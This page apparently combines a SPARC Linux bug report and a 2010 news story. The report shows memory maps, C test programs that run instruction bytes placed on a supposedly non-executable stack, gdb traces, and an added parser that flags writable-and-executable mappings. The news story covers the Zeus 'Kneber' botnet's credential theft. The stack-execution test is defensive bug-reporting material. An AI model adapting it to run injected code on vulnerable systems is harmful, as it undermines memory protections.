00026000-00048000 rwxp 00000000 00:00 0 [heap]
f7cf0000-f7e2a000 r--p 00000000 08:02 295830 /usr/lib/locale/locale-archive
f7e2c000-f7fa4000 r-xp 00000000 08:02 1277958 /lib/ultra3/libc-2.7.so
f7fa4000-f7fb4000 ---p 00178000 08:02 1277958 /lib/ultra3/libc-2.7.so
f7fb4000-f7fba000 rwxp 00178000 08:02 1277958 /lib/ultra3/libc-2.7.so
f7fba000-f7fbc000 rwxp 00000000 00:00 0
f7fbc000-f7fde000 r-xp 00000000 08:02 1270085 /lib/ld-2.7.so
f7fec000-f7ff0000 rwxp 00020000 08:02 1270085 /lib/ld-2.7.so
f7ff0000-f7ff2000 rw-p 00000000 00:00 0
ffdb6000-ffde0000 rw-p 00000000 00:00 0 [stack]

First test case:
#include <stdio.h>

typedef int (* _wee)(void);

int main(void)
{
	/* SPARC "ret" instruction placed on the (non-executable) stack */
	char buf[4] = { '\x81', '\xc7', '\xe0', '\x08' };
	_wee wee;
	printf("%p\n", &buf);
	wee = (_wee)&buf;
	wee();

	return 0;
}

gdb output in 90-95% of the cases:
Program received signal SIGSEGV, Segmentation fault.
0xff9d9cb0 in ?? ()

gdb output in the other 5-10% of cases:
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/test
0xff811cb0

Program received signal SIGBUS, Bus error.
0xff811cb4 in ?? ()
(gdb) x/x 0xff811cb0
0xff811cb0: 0x81c7e008
(gdb) x/i 0xff811cb0
0xff811cb0: ret
0xff811cb4: lda [ %g4 + %l0 ] (229), %f31

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/test
0xff97dcb0

Program received signal SIGILL, Illegal instruction.
0xff97dcb4 in ?? ()
(gdb) x/8x $pc-4
0xff97dcb0: 0x81c7e008 0xff97dcb0 0xf7f3af00 0x00000000
0xff97dcc0: 0x00000000 0x00000000 0xfffffffc 0x00000000
(gdb) x/i $pc-4
0xff97dcb0: ret
0xff97dcb4: ldqa [ %i7 + %l0 ] (229), %f62

modified code so it executed a ret / restore:
#include <stdio.h>

typedef int (* _wee)(void);

int main(void)
{
	/* SPARC "ret" followed by "restore", so the call can return cleanly */
	char buf[8] = { '\x81', '\xc7', '\xe0', '\x08', '\x81', '\xe8',
			'\x00', '\x00' };
	_wee wee;
	printf("%p\n", &buf);
	wee = (_wee)&buf;
	wee();

	return 0;
}

gdb output in the 5-10% case:
Starting program: /root/test
0xffb4fca8

Program exited with code 01.
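As an added example (not part of Brad's report), the following C program parses lines in the /proc/self/maps format shown above and reports two things a defender checks when reviewing a process's memory layout: whether the [stack] mapping carries the x bit, and how many mappings are writable and executable at the same time. The sample lines are constructed from the report's own output; the names parse_maps_line, is_wx and scan_maps are assumptions. Note what this check can and cannot tell you: on the sample it confirms the stack is mapped rw-p, which is exactly why execution of the stack bytes in the report is a kernel/MMU defect rather than a permissions mistake; the maps view alone cannot detect that defect.

```c
/* Added example (not from the report): parse /proc/self/maps lines and flag
 * mappings that are both writable and executable; sample input constructed
 * from the report's output. */
#include <stdio.h>
#include <string.h>

struct mapping {
    unsigned long start, end;
    char perms[5];      /* e.g. "rwxp" */
    char name[64];      /* path or pseudo-name such as [stack]; "" if none */
};

/* Parse one maps line: "start-end perms offset dev inode [path]".
 * Returns 1 on success, 0 if the line does not match the format. */
int parse_maps_line(const char *line, struct mapping *m)
{
    unsigned long off, ino;
    char dev[16];
    m->name[0] = '\0';
    int n = sscanf(line, "%lx-%lx %4s %lx %15s %lu %63s",
                   &m->start, &m->end, m->perms, &off, dev, &ino, m->name);
    return n >= 6;      /* the path field is optional */
}

/* A mapping violates W^X when it is writable and executable at once. */
int is_wx(const struct mapping *m)
{
    return m->perms[1] == 'w' && m->perms[2] == 'x';
}

/* Scan a buffer of maps lines. Returns the number of W^X mappings and sets
 * *stack_exec to 1/0 for the [stack] line's x bit, or -1 if no [stack]. */
int scan_maps(const char *text, int *stack_exec)
{
    int wx = 0;
    *stack_exec = -1;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        struct mapping m;
        if (parse_maps_line(line, &m)) {
            if (is_wx(&m)) wx++;
            if (strcmp(m.name, "[stack]") == 0)
                *stack_exec = (m.perms[2] == 'x');
        }
        p = nl ? nl + 1 : p + len;
    }
    return wx;
}

/* Constructed sample: a subset of the report's /proc/self/maps output. */
static const char SAMPLE_MAPS[] =
    "00010000-00014000 r-xp 00000000 08:02 1769474 /bin/cat\n"
    "00024000-00026000 rwxp 00004000 08:02 1769474 /bin/cat\n"
    "00026000-00048000 rwxp 00000000 00:00 0 [heap]\n"
    "f7ff0000-f7ff2000 rw-p 00000000 00:00 0\n"
    "ffdb6000-ffde0000 rw-p 00000000 00:00 0 [stack]\n";

/* Runs the scan over the sample; returns the W^X count (2 for this sample). */
int demo_scan(int *stack_exec)
{
    return scan_maps(SAMPLE_MAPS, stack_exec);
}

int main(void)
{
    int stack_exec;
    int wx = demo_scan(&stack_exec);
    printf("W^X mappings: %d, stack executable: %d\n", wx, stack_exec);
    return 0;
}
```

On the sample the data segment of /bin/cat and the heap are the two rwxp mappings, a layout worth noting on its own, while the stack reports as non-executable just as the ABI requires.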

Source


Feb 18 2010

Zeus Trojan found on 74,000 PCs in global botnet

More than 74,000 PCs at nearly 2,500 organizations around the globe were compromised over the past year and a half in a botnet infestation designed to steal login credentials to bank sites, social networks, and e-mail systems, a security firm said Wednesday.

The systems were infected with the Zeus Trojan and the botnet was dubbed “Kneber” after a username that linked the infected PCs on corporate and government systems, according to NetWitness.

The Wall Street Journal reported that Merck, Cardinal Health, Paramount Pictures, and Juniper Networks were among the targets in the attack. NetWitness speculated that criminals in Eastern Europe using a command-and-control server in Germany sent attachments containing the malware in e-mails or links to the malware on Web sites that employees within the companies clicked on.

NetWitness said it discovered more than 75 gigabytes worth of stolen data during routine analytic tasks as part of an evaluation of a client network on January 26. The cache of stolen data included 68,000 corporate login credentials, access to e-mail systems, online banking sites, Facebook, Yahoo, Hotmail, 2,000 SSL (Secure Sockets Layer) certificate files and data on individuals, NetWitness said in a statement and in a whitepaper available for download from its Web site.

In addition to stealing specific data, Zeus can be used to search for and steal any file on the computer, download and execute programs and allow someone to remotely control the computer.

More than half of the compromised machines were also infected with peer-to-peer bot malware called Waledac, the company said. Nearly 200 countries were affected, with most of the infections found in Egypt, Mexico, Saudi Arabia, Turkey and the United States.

The news comes after Google announced an attack targeting it and what is believed to be more than 30 other companies and which was linked back to China. McAfee dubbed that attack “Operation Aurora.”

“While Operation Aurora shed light on advanced threats from sponsored adversaries, the number of compromised companies and organizations pales in comparison to this single botnet,” said Amit Yoran, chief executive of NetWitness and former Director of the National Cyber Security Division. “These large-scale compromises of enterprise networks have reached epidemic levels.”

Source